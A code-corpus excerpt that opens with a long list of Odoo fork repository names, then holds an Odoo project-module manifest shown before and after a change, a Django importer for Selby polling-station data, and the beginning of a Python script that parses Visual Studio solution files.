erry/odoo,bguillot/OpenUpgrade,CopeX/odoo,ThinkOpen-Solutions/odoo,CopeX/odoo,NL66278/OCB,fevxie/odoo,jaxkodex/odoo,ujjwalwahi/odoo,mustafat/odoo-1,camptocamp/ngo-addons-backport,ChanduERP/odoo,mustafat/odoo-1,luistorresm/odoo,hmen89/odoo,Ichag/odoo,bguillot/OpenUpgrade,ujjwalwahi/odoo,BT-ojossen/odoo,jusdng/odoo,thanhacun/odoo,sergio-incaser/odoo,windedge/odoo,brijeshkesariya/odoo,codekaki/odoo,juanalfonsopr/odoo,minhtuancn/odoo,syci/OCB,MarcosCommunity/odoo,fuselock/odoo,inspyration/odoo,lombritz/odoo,microcom/odoo,Noviat/odoo,0k/OpenUpgrade,SerpentCS/odoo,0k/odoo,rowemoore/odoo,guewen/OpenUpgrade,luistorresm/odoo,collex100/odoo,numerigraphe/odoo,CopeX/odoo,windedge/odoo,gavin-feng/odoo,gavin-feng/odoo,nagyistoce/odoo-dev-odoo,hassoon3/odoo,blaggacao/OpenUpgrade,BT-ojossen/odoo,camptocamp/ngo-addons-backport,Antiun/odoo,ecosoft-odoo/odoo,mkieszek/odoo,klunwebale/odoo,OpusVL/odoo,datenbetrieb/odoo,fgesora/odoo,naousse/odoo,SAM-IT-SA/odoo,abstract-open-solutions/OCB,eino-makitalo/odoo,oliverhr/odoo,cpyou/odoo,takis/odoo,storm-computers/odoo,nhomar/odoo,ygol/odoo,virgree/odoo,patmcb/odoo,bobisme/odoo,funkring/fdoo,Nick-OpusVL/odoo,dgzurita/odoo,OpenPymeMx/OCB,MarcosCommunity/odoo,luiseduardohdbackup/odoo,rdeheele/odoo,aviciimaxwell/odoo,tinkhaven-organization/odoo,windedge/odoo,wangjun/odoo,charbeljc/OCB,hoatle/odoo,gvb/odoo,Kilhog/odoo,matrixise/odoo,lgscofield/odoo,syci/OCB,abenzbiria/clients_odoo,NL66278/OCB,hanicker/odoo,dariemp/odoo,dariemp/odoo,ubic135/odoo-design,hip-odoo/odoo,ygol/odoo,naousse/odoo,steedos/odoo,spadae22/odoo,ClearCorp-dev/odoo,frouty/odoogoeen,makinacorpus/odoo,x111ong/odoo,aviciimaxwell/odoo,factorlibre/OCB,GauravSahu/odoo,fuhongliang/odoo,jusdng/odoo,leoliujie/odoo,JCA-Developpement/Odoo,steedos/odoo,savoirfairelinux/odoo,matrixise/odoo,prospwro/odoo,Codefans-fan/odoo,dalegregory/odoo,0k/odoo,shingonoide/odoo,hifly/OpenUpgrade,OpenPymeMx/OCB,apanju/GMIO_Odoo,damdam-s/OpenUpgrade,ovnicraft/odoo,CatsAndDogsbvba/odoo,rowemoore/odoo,GauravSahu/
odoo,pedrobaeza/OpenUpgrade,massot/odoo,Gitlab11/odoo,odoousers2014/odoo,VielSoft/odoo,realsaiko/odoo,mszewczy/odoo,dalegregory/odoo,feroda/odoo,AuyaJackie/odoo,0k/odoo,RafaelTorrealba/odoo,JCA-Developpement/Odoo,addition-it-solutions/project-all,xzYue/odoo,nhomar/odoo,hbrunn/OpenUpgrade,highco-groupe/odoo,odooindia/odoo,joshuajan/odoo,rubencabrera/odoo,diagramsoftware/odoo,addition-it-solutions/project-all,srimai/odoo,savoirfairelinux/odoo,papouso/odoo,ygol/odoo,funkring/fdoo,pedrobaeza/OpenUpgrade,Endika/odoo,gsmartway/odoo,csrocha/OpenUpgrade,cdrooom/odoo,sergio-incaser/odoo,xzYue/odoo,factorlibre/OCB,colinnewell/odoo,fgesora/odoo,alhashash/odoo,hubsaysnuaa/odoo,bplancher/odoo,erkrishna9/odoo,omprakasha/odoo,sebalix/OpenUpgrade,mmbtba/odoo,sv-dev1/odoo,x111ong/odoo,zchking/odoo,JGarcia-Panach/odoo,chiragjogi/odoo,makinacorpus/odoo,rubencabrera/odoo,NeovaHealth/odoo,SAM-IT-SA/odoo,ehirt/odoo,shaufi10/odoo,aviciimaxwell/odoo,bguillot/OpenUpgrade,kittiu/odoo,abdellatifkarroum/odoo,shingonoide/odoo,alexcuellar/odoo,shaufi/odoo,bkirui/odoo,oliverhr/odoo,hopeall/odoo,tvibliani/odoo,stephen144/odoo,mszewczy/odoo,sebalix/OpenUpgrade,jeasoft/odoo,lombritz/odoo,sinbazhou/odoo,dezynetechnologies/odoo,tinkhaven-organization/odoo,agrista/odoo-saas,pplatek/odoo,hassoon3/odoo,KontorConsulting/odoo,nhomar/odoo,eino-makitalo/odoo,Danisan/odoo-1,jfpla/odoo,frouty/odoo_oph,OpenPymeMx/OCB,grap/OpenUpgrade,rgeleta/odoo,cpyou/odoo,alhashash/odoo,jeasoft/odoo,apanju/odoo,fjbatresv/odoo,matrixise/odoo,hip-odoo/odoo,doomsterinc/odoo,idncom/odoo,OpenUpgrade/OpenUpgrade,javierTerry/odoo,SAM-IT-SA/odoo,abstract-open-solutions/OCB,tvtsoft/odoo8,AuyaJackie/odoo,JonathanStein/odoo,gavin-feng/odoo,doomsterinc/odoo,kybriainfotech/iSocioCRM,mmbtba/odoo,Codefans-fan/odoo,hifly/OpenUpgrade,bplancher/odoo,synconics/odoo,OpenUpgrade-dev/OpenUpgrade,poljeff/odoo,dllsf/odootest,BT-ojossen/odoo,mlaitinen/odoo,vnsofthe/odoo,lombritz/odoo,slevenhagen/odoo-npg,lgscofield/odoo,juanalfonsopr/odoo,ujjwalwahi/
odoo,poljeff/odoo,highco-groupe/odoo,apanju/GMIO_Odoo,hoatle/odoo,PongPi/isl-odoo,ThinkOpen-Solutions/odoo,fevxie/odoo,nagyistoce/odoo-dev-odoo,hoatle/odoo,cysnake4713/odoo,jesramirez/odoo,Codefans-fan/odoo,frouty/odoogoeen,hubsaysnuaa/odoo,bakhtout/odoo-educ,collex100/odoo,hoatle/odoo,fjbatresv/odoo,dezynetechnologies/odoo,synconics/odoo,ClearCorp-dev/odoo,Codefans-fan/odoo,stephen144/odoo,ingadhoc/odoo,omprakasha/odoo,hubsaysnuaa/odoo,pplatek/odoo,PongPi/isl-odoo,odoo-turkiye/odoo,mlaitinen/odoo,tarzan0820/odoo,Gitlab11/odoo,mustafat/odoo-1,avoinsystems/odoo,gorjuce/odoo,camptocamp/ngo-addons-backport,javierTerry/odoo,nagyistoce/odoo-dev-odoo,sergio-incaser/odoo,ramitalat/odoo,ygol/odoo,srsman/odoo,addition-it-solutions/project-all,factorlibre/OCB,storm-computers/odoo,dkubiak789/odoo,agrista/odoo-saas,podemos-info/odoo,arthru/OpenUpgrade,apanju/GMIO_Odoo,mvaled/OpenUpgrade,codekaki/odoo,Daniel-CA/odoo,kybriainfotech/iSocioCRM,srsman/odoo,Endika/OpenUpgrade,ccomb/OpenUpgrade,JonathanStein/odoo,OpenPymeMx/OCB,shivam1111/odoo,ramitalat/odoo,VitalPet/odoo,credativUK/OCB,jusdng/odoo,dllsf/odootest,poljeff/odoo,pedrobaeza/odoo,codekaki/odoo,cloud9UG/odoo,ojengwa/odoo,hopeall/odoo,pedrobaeza/odoo,Noviat/odoo,CopeX/odoo,idncom/odoo,ingadhoc/odoo,kifcaliph/odoo,sinbazhou/odoo,ojengwa/odoo,feroda/odoo,oasiswork/odoo,pedrobaeza/OpenUpgrade,abenzbiria/clients_odoo,nexiles/odoo,xzYue/odoo,storm-computers/odoo,doomsterinc/odoo,dgzurita/odoo,nuncjo/odoo,mlaitinen/odoo,Noviat/odoo,BT-ojossen/odoo,eino-makitalo/odoo,gvb/odoo,bakhtout/odoo-educ,stonegithubs/odoo,bealdav/OpenUpgrade,BT-fgarbely/odoo,rschnapka/odoo,feroda/odoo,florentx/OpenUpgrade,Daniel-CA/odoo,leoliujie/odoo,0k/OpenUpgrade,Endika/odoo,simongoffin/website_version,grap/OpenUpgrade,fjbatresv/odoo,dkubiak789/odoo,luiseduardohdbackup/odoo,ShineFan/odoo,VitalPet/odoo,makinacorpus/odoo,Endika/OpenUpgrade,bkirui/odoo,florian-dacosta/OpenUpgrade,frouty/odoogoeen,hopeall/odoo,javierTerry/odoo,hopeall/odoo,klunwebale/odoo,osv
alr/odoo,minhtuancn/odoo,incaser/odoo-odoo,ihsanudin/odoo,cloud9UG/odoo,sergio-incaser/odoo,florian-dacosta/OpenUpgrade,sebalix/OpenUpgrade,tarzan0820/odoo,nitinitprof/odoo,arthru/OpenUpgrade,odootr/odoo,rschnapka/odoo,guewen/OpenUpgrade,nhomar/odoo,CatsAndDogsbvba/odoo,lsinfo/odoo,ChanduERP/odoo,eino-makitalo/odoo,oihane/odoo,slevenhagen/odoo,ccomb/OpenUpgrade,steedos/odoo,VitalPet/odoo,charbeljc/OCB,mlaitinen/odoo,damdam-s/OpenUpgrade,nitinitprof/odoo,jiangzhixiao/odoo,podemos-info/odoo,Elico-Corp/odoo_OCB,ihsanudin/odoo,incaser/odoo-odoo,codekaki/odoo,dfang/odoo,luistorresm/odoo,papouso/odoo,jeasoft/odoo,alqfahad/odoo,sysadminmatmoz/OCB,Ernesto99/odoo,MarcosCommunity/odoo,tinkerthaler/odoo,odoousers2014/odoo,ramadhane/odoo,luiseduardohdbackup/odoo,dgzurita/odoo,factorlibre/OCB,funkring/fdoo,andreparames/odoo,pedrobaeza/odoo,rubencabrera/odoo,jfpla/odoo,NL66278/OCB,Bachaco-ve/odoo,dsfsdgsbngfggb/odoo,joariasl/odoo,shingonoide/odoo,stephen144/odoo,bguillot/OpenUpgrade,patmcb/odoo,thanhacun/odoo,feroda/odoo,ApuliaSoftware/odoo,tarzan0820/odoo,javierTerry/odoo,rowemoore/odoo,ihsanudin/odoo,eino-makitalo/odoo,prospwro/odoo,windedge/odoo,damdam-s/OpenUpgrade,jiachenning/odoo,srsman/odoo,gdgellatly/OCB1,doomsterinc/odoo,Gitlab11/odoo,Antiun/odoo,bobisme/odoo,optima-ict/odoo,ojengwa/odoo,GauravSahu/odoo,nuuuboo/odoo,PongPi/isl-odoo,srimai/odoo,Nick-OpusVL/odoo,Grirrane/odoo,dsfsdgsbngfggb/odoo,nitinitprof/odoo,guerrerocarlos/odoo,abdellatifkarroum/odoo,addition-it-solutions/project-all,BT-astauder/odoo,Adel-Magebinary/odoo,RafaelTorrealba/odoo,synconics/odoo,jiachenning/odoo,fossoult/odoo,grap/OpenUpgrade,damdam-s/OpenUpgrade,mszewczy/odoo,inspyration/odoo,gdgellatly/OCB1,gavin-feng/odoo,Antiun/odoo,datenbetrieb/odoo,goliveirab/odoo,hanicker/odoo,shaufi10/odoo,prospwro/odoo,RafaelTorrealba/odoo,Daniel-CA/odoo,jfpla/odoo,sv-dev1/odoo,Ichag/odoo,shaufi10/odoo,BT-rmartin/odoo,odoousers2014/odoo,tangyiyong/odoo,savoirfairelinux/odoo,dsfsdgsbngfggb/odoo,ihsanudin/odoo,ecosoft
-odoo/odoo,jeasoft/odoo,poljeff/odoo,tangyiyong/odoo,acshan/odoo,factorlibre/OCB,apanju/odoo,PongPi/isl-odoo,Endika/OpenUpgrade,lsinfo/odoo,nhomar/odoo-mirror,doomsterinc/odoo,optima-ict/odoo,microcom/odoo,mvaled/OpenUpgrade,sv-dev1/odoo,ubic135/odoo-design,joshuajan/odoo,hmen89/odoo,kirca/OpenUpgrade,dezynetechnologies/odoo,slevenhagen/odoo,shivam1111/odoo,BT-fgarbely/odoo,fuhongliang/odoo,frouty/odoogoeen,odoousers2014/odoo,jiachenning/odoo,wangjun/odoo,guerrerocarlos/odoo,dariemp/odoo,fgesora/odoo,VitalPet/odoo,cloud9UG/odoo,n0m4dz/odoo,Endika/odoo,codekaki/odoo,dalegregory/odoo,rowemoore/odoo,diagramsoftware/odoo,spadae22/odoo,hassoon3/odoo,Nick-OpusVL/odoo,shaufi10/odoo,fuselock/odoo,lightcn/odoo,laslabs/odoo,andreparames/odoo,nuuuboo/odoo,CubicERP/odoo,Antiun/odoo,NL66278/OCB,odooindia/odoo,hifly/OpenUpgrade,jeasoft/odoo,jiachenning/odoo,grap/OCB,shingonoide/odoo,pedrobaeza/odoo,bkirui/odoo,nhomar/odoo,Codefans-fan/odoo,hifly/OpenUpgrade,bakhtout/odoo-educ,ApuliaSoftware/odoo,Gitlab11/odoo,bwrsandman/OpenUpgrade,codekaki/odoo,rschnapka/odoo,florian-dacosta/OpenUpgrade,odoo-turkiye/odoo,xzYue/odoo,hifly/OpenUpgrade,alexcuellar/odoo,sinbazhou/odoo,mkieszek/odoo,dfang/odoo,simongoffin/website_version,spadae22/odoo,simongoffin/website_version,sv-dev1/odoo,florian-dacosta/OpenUpgrade,alexteodor/odoo,massot/odoo,abenzbiria/clients_odoo,BT-fgarbely/odoo,janocat/odoo,rahuldhote/odoo,hifly/OpenUpgrade,cedk/odoo,salaria/odoo,osvalr/odoo,jiangzhixiao/odoo,ThinkOpen-Solutions/odoo,Endika/OpenUpgrade,jaxkodex/odoo,0k/odoo,idncom/odoo,hip-odoo/odoo,tarzan0820/odoo,mmbtba/odoo,hanicker/odoo,brijeshkesariya/odoo,Codefans-fan/odoo,ShineFan/odoo,joshuajan/odoo,bealdav/OpenUpgrade,gsmartway/odoo,Grirrane/odoo,rschnapka/odoo,incaser/odoo-odoo,BT-rmartin/odoo,slevenhagen/odoo,alexteodor/odoo,Kilhog/odoo,PongPi/isl-odoo,ChanduERP/odoo,mlaitinen/odoo,apanju/odoo,kirca/OpenUpgrade,dllsf/odootest,deKupini/erp,draugiskisprendimai/odoo,mszewczy/odoo,makinacorpus/odoo,realsaiko/odoo,BT-o
jossen/odoo,ujjwalwahi/odoo,bakhtout/odoo-educ,collex100/odoo,demon-ru/iml-crm,xujb/odoo,brijeshkesariya/odoo,mustafat/odoo-1,n0m4dz/odoo,ShineFan/odoo,hanicker/odoo,sysadminmatmoz/OCB,nitinitprof/odoo,JonathanStein/odoo,ygol/odoo,sve-odoo/odoo,odootr/odoo,ShineFan/odoo,papouso/odoo,havt/odoo,agrista/odoo-saas,Nowheresly/odoo,csrocha/OpenUpgrade,gvb/odoo,laslabs/odoo,leoliujie/odoo,rahuldhote/odoo,dariemp/odoo,sergio-incaser/odoo,pedrobaeza/odoo,joshuajan/odoo,jpshort/odoo,Nick-OpusVL/odoo,mmbtba/odoo,oihane/odoo,OpusVL/odoo,erkrishna9/odoo,Ichag/odoo,sve-odoo/odoo,srsman/odoo,joariasl/odoo,fjbatresv/odoo,charbeljc/OCB,diagramsoftware/odoo,mvaled/OpenUpgrade,OpenUpgrade-dev/OpenUpgrade,bplancher/odoo,kybriainfotech/iSocioCRM,nitinitprof/odoo,Maspear/odoo,SAM-IT-SA/odoo,hassoon3/odoo,kifcaliph/odoo,wangjun/odoo,andreparames/odoo,ecosoft-odoo/odoo,abstract-open-solutions/OCB,sinbazhou/odoo,dariemp/odoo,salaria/odoo,dezynetechnologies/odoo,QianBIG/odoo,nuuuboo/odoo,datenbetrieb/odoo,andreparames/odoo,Ichag/odoo,realsaiko/odoo,ThinkOpen-Solutions/odoo,oasiswork/odoo,microcom/odoo,Ernesto99/odoo,nagyistoce/odoo-dev-odoo,Eric-Zhong/odoo,Nick-OpusVL/odoo,Gitlab11/odoo,klunwebale/odoo,vrenaville/ngo-addons-backport,x111ong/odoo,OpenUpgrade/OpenUpgrade,vnsofthe/odoo,Antiun/odoo,oliverhr/odoo,VielSoft/odoo,slevenhagen/odoo-npg,jiangzhixiao/odoo,mlaitinen/odoo,JonathanStein/odoo,deKupini/erp,srimai/odoo,kittiu/odoo,Elico-Corp/odoo_OCB,fevxie/odoo,stonegithubs/odoo,guerrerocarlos/odoo,sysadminmatmoz/OCB,syci/OCB,hopeall/odoo,tvibliani/odoo,x111ong/odoo,kybriainfotech/iSocioCRM,numerigraphe/odoo,naousse/odoo,ovnicraft/odoo,rschnapka/odoo,thanhacun/odoo,VielSoft/odoo,bealdav/OpenUpgrade,fuselock/odoo,Adel-Magebinary/odoo,dalegregory/odoo,goliveirab/odoo,NeovaHealth/odoo,tinkerthaler/odoo,shaufi/odoo,hanicker/odoo,hmen89/odoo,fuselock/odoo,CopeX/odoo,cloud9UG/odoo,waytai/odoo,shaufi/odoo,provaleks/o8,ChanduERP/odoo,papouso/odoo,grap/OpenUpgrade,lsinfo/odoo,bealdav/OpenUpgrade,avoi
nsystems/odoo,fdvarela/odoo8,ramadhane/odoo,apocalypsebg/odoo,shivam1111/odoo,poljeff/odoo,sebalix/OpenUpgrade,Noviat/odoo,mmbtba/odoo,ihsanudin/odoo,kybriainfotech/iSocioCRM,OpenUpgrade/OpenUpgrade,nexiles/odoo,grap/OpenUpgrade,JonathanStein/odoo,ygol/odoo,jaxkodex/odoo,oliverhr/odoo,gdgellatly/OCB1,takis/odoo,sebalix/OpenUpgrade,agrista/odoo-saas,bwrsandman/OpenUpgrade,tinkhaven-organization/odoo,nuncjo/odoo,ujjwalwahi/odoo,poljeff/odoo,OSSESAC/odoopubarquiluz,jeasoft/odoo,colinnewell/odoo,srsman/odoo,xujb/odoo,abdellatifkarroum/odoo,guewen/OpenUpgrade,makinacorpus/odoo,blaggacao/OpenUpgrade,naousse/odoo,optima-ict/odoo,Danisan/odoo-1,guerrerocarlos/odoo,dalegregory/odoo,elmerdpadilla/iv,aviciimaxwell/odoo,alqfahad/odoo,Danisan/odoo-1,jiangzhixiao/odoo,vnsofthe/odoo,credativUK/OCB,odootr/odoo,fossoult/odoo,Adel-Magebinary/odoo,mszewczy/odoo,BT-astauder/odoo,lgscofield/odoo,csrocha/OpenUpgrade,klunwebale/odoo,odootr/odoo,OSSESAC/odoopubarquiluz,virgree/odoo,bguillot/OpenUpgrade,Nick-OpusVL/odoo,blaggacao/OpenUpgrade,jfpla/odoo,fuhongliang/odoo,florentx/OpenUpgrade,Drooids/odoo,kittiu/odoo,oihane/odoo,tarzan0820/odoo,hubsaysnuaa/odoo,ygol/odoo,cedk/odoo,leorochael/odoo,bwrsandman/OpenUpgrade,kittiu/odoo,camptocamp/ngo-addons-backport,sysadminmatmoz/OCB,ihsanudin/odoo,ClearCorp-dev/odoo,janocat/odoo,lgscofield/odoo,ehirt/odoo,mkieszek/odoo,markeTIC/OCB,papouso/odoo,sadleader/odoo,florian-dacosta/OpenUpgrade,JonathanStein/odoo,Noviat/odoo,frouty/odoogoeen,laslabs/odoo,Kilhog/odoo,havt/odoo,jiangzhixiao/odoo,jpshort/odoo,andreparames/odoo,odoousers2014/odoo,nexiles/odoo,apocalypsebg/odoo,dfang/odoo,VielSoft/odoo,vnsofthe/odoo,demon-ru/iml-crm,guerrerocarlos/odoo,n0m4dz/odoo,frouty/odoogoeen,grap/OCB,dllsf/odootest,pedrobaeza/odoo,mvaled/OpenUpgrade,lightcn/odoo,apocalypsebg/odoo,rgeleta/odoo,janocat/odoo,damdam-s/OpenUpgrade,mkieszek/odoo,CatsAndDogsbvba/odoo,nitinitprof/odoo,MarcosCommunity/odoo,tvtsoft/odoo8,guerrerocarlos/odoo,Noviat/odoo,jfpla/odoo,feroda/odoo,Adel
-Magebinary/odoo,elmerdpadilla/iv,wangjun/odoo,OSSESAC/odoopubarquiluz,christophlsa/odoo,kittiu/odoo,OSSESAC/odoopubarquiluz,xujb/odoo,bkirui/odoo,synconics/odoo,lsinfo/odoo,elmerdpadilla/iv,rubencabrera/odoo,savoirfairelinux/OpenUpgrade,Adel-Magebinary/odoo,klunwebale/odoo,Drooids/odoo,dkubiak789/odoo,pplatek/odoo,osvalr/odoo,apanju/odoo,odootr/odoo,hoatle/odoo,ubic135/odoo-design,Daniel-CA/odoo,ShineFan/odoo,hbrunn/OpenUpgrade,tangyiyong/odoo,TRESCLOUD/odoopub,alhashash/odoo,collex100/odoo,Ichag/odoo,wangjun/odoo,provaleks/o8,christophlsa/odoo,juanalfonsopr/odoo,Nowheresly/odoo,highco-groupe/odoo,BT-astauder/odoo,virgree/odoo,sysadminmatmoz/OCB,ShineFan/odoo,sv-dev1/odoo,VitalPet/odoo,Nowheresly/odoo,ehirt/odoo,Adel-Magebinary/odoo,papouso/odoo,ClearCorp-dev/odoo,florian-dacosta/OpenUpgrade,cpyou/odoo,hmen89/odoo,0k/OpenUpgrade,patmcb/odoo,avoinsystems/odoo,n0m4dz/odoo,TRESCLOUD/odoopub,odoo-turkiye/odoo,christophlsa/odoo,abstract-open-solutions/OCB,BT-rmartin/odoo,havt/odoo,hip-odoo/odoo,dariemp/odoo,frouty/odoogoeen,avoinsystems/odoo,javierTerry/odoo,ojengwa/odoo,BT-rmartin/odoo,shingonoide/odoo,omprakasha/odoo,osvalr/odoo,OpenUpgrade-dev/OpenUpgrade,odootr/odoo,abstract-open-solutions/OCB,matrixise/odoo,omprakasha/odoo,vrenaville/ngo-addons-backport,salaria/odoo,bakhtout/odoo-educ,colinnewell/odoo,makinacorpus/odoo,MarcosCommunity/odoo,cpyou/odoo,ovnicraft/odoo,charbeljc/OCB,bobisme/odoo,jolevq/odoopub,osvalr/odoo,rowemoore/odoo,fuhongliang/odoo,BT-astauder/odoo,eino-makitalo/odoo,idncom/odoo,sve-odoo/odoo,fuhongliang/odoo,CatsAndDogsbvba/odoo,sv-dev1/odoo,christophlsa/odoo,jusdng/odoo,mszewczy/odoo,sergio-incaser/odoo,lgscofield/odoo,jesramirez/odoo,Grirrane/odoo,gsmartway/odoo,pplatek/odoo,FlorianLudwig/odoo,MarcosCommunity/odoo,sadleader/odoo,draugiskisprendimai/odoo,FlorianLudwig/odoo,nagyistoce/odoo-dev-odoo,leoliujie/odoo,savoirfairelinux/OpenUpgrade,glovebx/odoo,shivam1111/odoo,cysnake4713/odoo,fossoult/odoo,mszewczy/odoo,AuyaJackie/odoo,ApuliaSoftware/o
doo,incaser/odoo-odoo,nuncjo/odoo,mkieszek/odoo,nhomar/odoo-mirror,rgeleta/odoo,mmbtba/odoo,vrenaville/ngo-addons-backport,salaria/odoo,arthru/OpenUpgrade,abdellatifkarroum/odoo,ojengwa/odoo,rahuldhote/odoo,dkubiak789/odoo,camptocamp/ngo-addons-backport,alqfahad/odoo,OpenUpgrade/OpenUpgrade,kifcaliph/odoo,mustafat/odoo-1,chiragjogi/odoo,odooindia/odoo,leoliujie/odoo,CopeX/odoo,virgree/odoo,provaleks/o8,rgeleta/odoo,aviciimaxwell/odoo,CubicERP/odoo,Ernesto99/odoo,kittiu/odoo,ChanduERP/odoo,Endika/OpenUpgrade,abenzbiria/clients_odoo,fdvarela/odoo8,alqfahad/odoo,alexcuellar/odoo,idncom/odoo,grap/OpenUpgrade,xujb/odoo,jaxkodex/odoo,incaser/odoo-odoo,Eric-Zhong/odoo,damdam-s/OpenUpgrade,bakhtout/odoo-educ,nuuuboo/odoo,BT-fgarbely/odoo,bobisme/odoo,leorochael/odoo,TRESCLOUD/odoopub,waytai/odoo,luiseduardohdbackup/odoo,0k/OpenUpgrade,savoirfairelinux/odoo,chiragjogi/odoo,QianBIG/odoo,datenbetrieb/odoo,goliveirab/odoo,ubic135/odoo-design,VitalPet/odoo,CubicERP/odoo,alexcuellar/odoo,naousse/odoo,jiangzhixiao/odoo,ovnicraft/odoo,cloud9UG/odoo,florentx/OpenUpgrade,rubencabrera/odoo,kirca/OpenUpgrade,podemos-info/odoo,bwrsandman/OpenUpgrade,tangyiyong/odoo,acshan/odoo,podemos-info/odoo,Noviat/odoo,gorjuce/odoo,sadleader/odoo,datenbetrieb/odoo,steedos/odoo,waytai/odoo,minhtuancn/odoo,Ichag/odoo,mvaled/OpenUpgrade,nuncjo/odoo,glovebx/odoo,omprakasha/odoo,tvibliani/odoo,camptocamp/ngo-addons-backport,tinkhaven-organization/odoo,naousse/odoo,TRESCLOUD/odoopub,bwrsandman/OpenUpgrade,spadae22/odoo,slevenhagen/odoo-npg,lightcn/odoo,eino-makitalo/odoo,microcom/odoo,cedk/odoo,juanalfonsopr/odoo,dalegregory/odoo,alexteodor/odoo,tvibliani/odoo,pplatek/odoo,incaser/odoo-odoo,Daniel-CA/odoo,KontorConsulting/odoo,tvtsoft/odoo8,fossoult/odoo,shaufi10/odoo,nhomar/odoo-mirror,SAM-IT-SA/odoo,tvibliani/odoo,pplatek/odoo,feroda/odoo,NeovaHealth/odoo,oliverhr/odoo,storm-computers/odoo,Elico-Corp/odoo_OCB,numerigraphe/odoo,JGarcia-Panach/odoo,alhashash/odoo,guewen/OpenUpgrade,oihane/odoo,mvaled/Open
Upgrade,dgzurita/odoo,xzYue/odoo,nuuuboo/odoo,kybriainfotech/iSocioCRM,lombritz/odoo,goliveirab/odoo,grap/OCB,srimai/odoo,x111ong/odoo,ecosoft-odoo/odoo,lsinfo/odoo,jolevq/odoopub,optima-ict/odoo,0k/OpenUpgrade,klunwebale/odoo,ecosoft-odoo/odoo,jusdng/odoo,QianBIG/odoo,FlorianLudwig/odoo,OpenPymeMx/OCB,Ernesto99/odoo,slevenhagen/odoo,GauravSahu/odoo,bobisme/odoo,wangjun/odoo,podemos-info/odoo,lsinfo/odoo,xujb/odoo,numerigraphe/odoo,Bachaco-ve/odoo,JGarcia-Panach/odoo,christophlsa/odoo,hassoon3/odoo,GauravSahu/odoo,rschnapka/odoo,diagramsoftware/odoo,joariasl/odoo,ApuliaSoftware/odoo,demon-ru/iml-crm,jiangzhixiao/odoo,ujjwalwahi/odoo,ccomb/OpenUpgrade,SerpentCS/odoo,odooindia/odoo,gvb/odoo,ChanduERP/odoo,draugiskisprendimai/odoo,osvalr/odoo,OSSESAC/odoopubarquiluz,patmcb/odoo,savoirfairelinux/odoo,leorochael/odoo | addons/project/__terp__.py | addons/project/__terp__.py | {
"name" : "Project Management",
"version": "1.0",
"author" : "Tiny",
"website" : "http://tinyerp.com/module_project.html",
"category" : "Generic Modules/Projects & Services",
"depends" : ["product", "account", 'mrp', 'sale', 'base'],
"description": "Project management module that track multi-level projects, tasks, works done on tasks, eso. It is able to render planning, order tasks, eso.",
"init_xml" : [],
"demo_xml" : ["project_demo.xml"],
"update_xml": [
"project_data.xml",
"project_wizard.xml",
"project_view.xml",
"project_report.xml",
"project_workflow.xml",
"project_security.xml",
],
"active": False,
"installable": True
}
| {
"name" : "Project Management",
"version": "1.0",
"author" : "Tiny",
"website" : "http://tinyerp.com/module_project.html",
"category" : "Generic Modules/Projects & Services",
"depends" : ["product", "account", 'mrp', 'sale', 'base'],
"description": "Project management module that track multi-level projects, tasks, works done on tasks, eso. It is able to render planning, order tasks, eso.",
"init_xml" : [],
"demo_xml" : ["project_demo.xml"],
"update_xml": ["project_data.xml", "project_wizard.xml", "project_view.xml", "project_report.xml", "project_workflow.xml"],
"active": False,
"installable": True
}
| agpl-3.0 | Python |
c1a378adcfd4ccccc44b0c9272e84a765f61f88a | add import script for Selby | chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_selby.py | polling_stations/apps/data_collection/management/commands/import_selby.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
    """Import polling district/station data for Selby from a tab-separated
    Xpress "Democracy Club" export (addresses and stations share one file)."""
    council_id = 'E07000169'  # council identifier (GSS code)
    addresses_name = 'SelbyDemocracy_Club__04May2017.tsv'
    stations_name = 'SelbyDemocracy_Club__04May2017.tsv'
    elections = ['local.north-yorkshire.2017-05-04']
    csv_delimiter = '\t'  # source file is TSV, not comma-separated
| bsd-3-clause | Python | |
c92fbe2d0d40d3fa1339bf9e2a645c0c8d36bdc3 | Add a tool to be able to diff sln files | csulmone/gyp,csulmone/gyp,csulmone/gyp,csulmone/gyp | tools/pretty_sln.py | tools/pretty_sln.py | #!/usr/bin/python2.5
# Copyright 2009 Google Inc.
# All Rights Reserved.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import re
import sys
def BuildProject(project, built, projects, deps):
  """Emit `project` after all of its dependencies (post-order).

  Prints each project name as it becomes buildable and appends it to
  `built`, which is mutated in place.  A project already present in
  `built` is skipped, so calling this on an already-built project no
  longer prints/appends it a second time.

  Note: a dependency cycle still causes infinite recursion.
  """
  if project in built:
    return
  for dep in deps[project]:
    if dep not in built:
      BuildProject(dep, built, projects, deps)
  print(project)
  built.append(project)
def ParseSolution(solution_file):
  """Parse a Visual Studio .sln file.

  Returns (projects, dependencies) where projects maps project name ->
  [path, clsid] and dependencies maps project name -> sorted list of
  dependency project names.  "_gyp" suffixes are stripped from names so
  gyp-generated and hand-written solutions diff cleanly.
  """
  # All projects, their clsid and paths.
  projects = dict()
  # A list of dependencies associated with a project.
  dependencies = dict()
  # Regular expressions that matches the SLN format.
  # The first line of a project definition.
  begin_project = re.compile(('^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
                              '}"\) = "(.*)", "(.*)", "(.*)"$'))
  # The last line of a project definition.
  end_project = re.compile('^EndProject$')
  # The first line of a dependency list.
  begin_dep = re.compile('ProjectSection\(ProjectDependencies\) = postProject$')
  # The last line of a dependency list.
  end_dep = re.compile('EndProjectSection$')
  # A line describing a dependency ({dependent clsid} = {dependency clsid}).
  dep_line = re.compile(' *({.*}) = ({.*})$')
  in_deps = False
  # NOTE(review): the file handle is never closed explicitly.
  solution = open(solution_file)
  for line in solution:
    results = begin_project.search(line)
    if results:
      # We remove "_gyp" from the names because it helps to diff them.
      current_project = results.group(1).replace('_gyp', '')
      projects[current_project] = [results.group(2).replace('_gyp', ''),
                                   results.group(3)]
      dependencies[current_project] = []
      continue
    results = end_project.search(line)
    if results:
      current_project = None
      continue
    results = begin_dep.search(line)
    if results:
      in_deps = True
      continue
    results = end_dep.search(line)
    if results:
      in_deps = False
      continue
    results = dep_line.search(line)
    if results and in_deps:
